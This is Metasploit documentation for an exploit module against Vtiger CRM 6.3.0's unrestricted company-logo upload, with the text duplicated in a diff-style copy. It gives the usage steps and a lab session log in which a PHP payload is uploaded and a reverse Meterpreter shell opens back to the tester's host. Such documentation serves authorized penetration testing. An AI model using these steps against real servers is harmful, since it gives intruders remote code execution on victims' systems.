documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md

## Description

Vtiger v6.3.0 CRM's administration interface allows for the upload of a company logo.
The logo upload allows unrestricted file upload and can be used to upload php code,
which can then be executed by requesting the uploaded file location.


## Vulnerable Application

[Vtiger v6.3.0](https://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.3.0/Core%20Product/)


## Options

**PHPSHORTTAG**
Specify the use of php short tag, `<? `, for wrapping the payload.
Default: true


## Verification Steps

1. `./msfconsole -q`
2. `use exploit/multi/http/vtiger_logo_upload_exec`
3. `set rhosts <rhost>`
4. `set password <password>`
5. `run`


## Scenarios

### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)

```
msf5 > use exploit/multi/http/vtiger_logo_upload_exec
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899
rport => 8899
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin
password => admin
msf5 exploit(multi/http/vtiger_logo_upload_exec) > run 

[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Uploading payload: KpXAXQNKjN.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500
[+] Deleted KpXAXQNKjN.php

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586
Meterpreter : php/windows
meterpreter >
```
Update module, Add documentation 2018-07-30 12:11:08 -05:00			`## Description`

			`Vtiger v6.3.0 CRM's administration interface allows for the upload of a company logo.`
			`The logo upload allows unrestricted file upload and can be used to upload php code,`
			`which can then be executed by requesting the uploaded file location.`


			`## Vulnerable Application`

			`[Vtiger v6.3.0](https://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.3.0/Core%20Product/)`


			`## Options`

			`PHPSHORTTAG`
			Specify the use of php short tag, `<? `, for wrapping the payload.
			`Default: true`


			`## Verification Steps`

			1. `./msfconsole -q`
			2. `use exploit/multi/http/vtiger_logo_upload_exec`
			3. `set rhosts <rhost>`
			4. `set password <password>`
			5. `run`


			`## Scenarios`

			`### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)`

			```
			`msf5 > use exploit/multi/http/vtiger_logo_upload_exec`
			`msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175`
			`rhosts => 172.22.222.175`
			`msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899`
			`rport => 8899`
			`msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin`
			`password => admin`
			`msf5 exploit(multi/http/vtiger_logo_upload_exec) > run`

			`[*] Started reverse TCP handler on 172.22.222.121:4444`
			`[*] Uploading payload: KpXAXQNKjN.php`
			`[*] Sending stage (37775 bytes) to 172.22.222.175`
			`[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500`
			`[+] Deleted KpXAXQNKjN.php`

			`meterpreter > sysinfo`
			`Computer : MSEDGEWIN10`
			`OS : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586`
			`Meterpreter : php/windows`
			`meterpreter >`
			```